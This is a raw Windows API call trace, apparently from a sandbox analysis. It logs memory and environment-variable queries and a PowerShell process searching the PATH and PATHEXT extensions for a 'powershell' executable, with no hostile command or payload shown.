	[0305.445] VirtualQuery (in: lpAddress=0x1c87ddf0, lpBuffer=0x1c87ecb0, dwLength=0x30 | out: lpBuffer=0x1c87ecb0*(BaseAddress=0x1c87d000, AllocationBase=0x1bef0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0305.445] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0305.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.445] CoTaskMemFree (pv=0x1b842cf0) 
	[0305.447] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0305.447] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.447] CoTaskMemFree (pv=0x1b842cf0) 
	[0305.448] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0305.448] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.448] CoTaskMemFree (pv=0x1b842cf0) 
	[0305.449] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0305.449] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.449] CoTaskMemFree (pv=0x1b842cf0) 
	[0306.358] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0306.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.358] CoTaskMemFree (pv=0x1b842cf0) 
	[0307.243] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0307.243] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.243] CoTaskMemFree (pv=0x1b842cf0) 
	[0307.245] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0307.245] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.245] CoTaskMemFree (pv=0x1b842cf0) 
	[0307.246] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0307.247] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.247] CoTaskMemFree (pv=0x1b842cf0) 
	[0307.249] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0307.249] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.249] CoTaskMemFree (pv=0x1b842cf0) 
	[0307.251] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0307.251] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.251] CoTaskMemFree (pv=0x1b842cf0) 
	[0307.252] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0307.252] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.252] CoTaskMemFree (pv=0x1b842cf0) 
	[0307.254] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0307.254] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.254] CoTaskMemFree (pv=0x1b842cf0) 
	[0307.272] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0307.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.272] CoTaskMemFree (pv=0x1b842cf0) 
	[0311.622] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0311.622] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0311.622] CoTaskMemFree (pv=0x1b842cf0) 
	[0312.774] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0312.774] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0312.774] CoTaskMemFree (pv=0x1b842cf0) 
	[0312.774] CoTaskMemAlloc (cb=0x128) returned 0x193ed0
	[0312.774] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x193ed0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0312.774] CoTaskMemFree (pv=0x193ed0) 
	[0315.719] CoTaskMemAlloc (cb=0x20e) returned 0x1b83b5e0
	[0315.719] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b83b5e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0315.720] CoTaskMemFree (pv=0x1b83b5e0) 
	[0316.179] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0316.181] SetErrorMode (uMode=0x1) returned 0x1
	[0316.183] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0323.861] SetErrorMode (uMode=0x1) returned 0x1
	[0324.297] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.297] SetErrorMode (uMode=0x1) returned 0x1
	[0324.297] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.305] SetErrorMode (uMode=0x1) returned 0x1
	[0324.307] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.307] SetErrorMode (uMode=0x1) returned 0x1
	[0324.307] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.316] SetErrorMode (uMode=0x1) returned 0x1
	[0324.317] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.317] SetErrorMode (uMode=0x1) returned 0x1
	[0324.318] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.326] SetErrorMode (uMode=0x1) returned 0x1
	[0325.107] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.108] SetErrorMode (uMode=0x1) returned 0x1
	[0325.108] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.116] SetErrorMode (uMode=0x1) returned 0x1
	[0325.118] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.118] SetErrorMode (uMode=0x1) returned 0x1
	[0325.118] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.127] SetErrorMode (uMode=0x1) returned 0x1
	[0325.128] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.129] SetErrorMode (uMode=0x1) returned 0x1
	[0325.129] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.137] SetErrorMode (uMode=0x1) returned 0x1
	[0325.139] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.140] SetErrorMode (uMode=0x1) returned 0x1
	[0325.140] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.150] SetErrorMode (uMode=0x1) returned 0x1
	[0325.151] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.151] SetErrorMode (uMode=0x1) returned 0x1
	[0325.152] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.081] SetErrorMode (uMode=0x1) returned 0x1
	[0326.082] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.082] SetErrorMode (uMode=0x1) returned 0x1
	[0326.082] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.091] SetErrorMode (uMode=0x1) returned 0x1
	[0326.092] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.092] SetErrorMode (uMode=0x1) returned 0x1
	[0326.092] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.100] SetErrorMode (uMode=0x1) returned 0x1
	[0326.102] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.102] SetErrorMode (uMode=0x1) returned 0x1
	[0326.102] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.110] SetErrorMode (uMode=0x1) returned 0x1
	[0326.111] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.111] SetErrorMode (uMode=0x1) returned 0x1
	[0326.112] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.119] SetErrorMode (uMode=0x1) returned 0x1
	[0326.121] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.121] SetErrorMode (uMode=0x1) returned 0x1
	[0327.010] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.018] SetErrorMode (uMode=0x1) returned 0x1
	[0327.020] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0327.020] SetErrorMode (uMode=0x1) returned 0x1
	[0327.020] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.028] SetErrorMode (uMode=0x1) returned 0x1
	[0327.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.030] SetErrorMode (uMode=0x1) returned 0x1
	[0327.030] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.030] SetErrorMode (uMode=0x1) returned 0x1
	[0327.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.031] SetErrorMode (uMode=0x1) returned 0x1
	[0327.031] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.031] SetErrorMode (uMode=0x1) returned 0x1
	[0327.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.031] SetErrorMode (uMode=0x1) returned 0x1
	[0327.031] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.032] SetErrorMode (uMode=0x1) returned 0x1
	[0327.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.032] SetErrorMode (uMode=0x1) returned 0x1
	[0327.032] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.032] SetErrorMode (uMode=0x1) returned 0x1
	[0327.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.033] SetErrorMode (uMode=0x1) returned 0x1
	[0327.033] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.033] SetErrorMode (uMode=0x1) returned 0x1
	[0327.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.033] SetErrorMode (uMode=0x1) returned 0x1
	[0327.033] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.034] SetErrorMode (uMode=0x1) returned 0x1
	[0327.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.034] SetErrorMode (uMode=0x1) returned 0x1
	[0327.034] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.034] SetErrorMode (uMode=0x1) returned 0x1
	[0327.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.035] SetErrorMode (uMode=0x1) returned 0x1
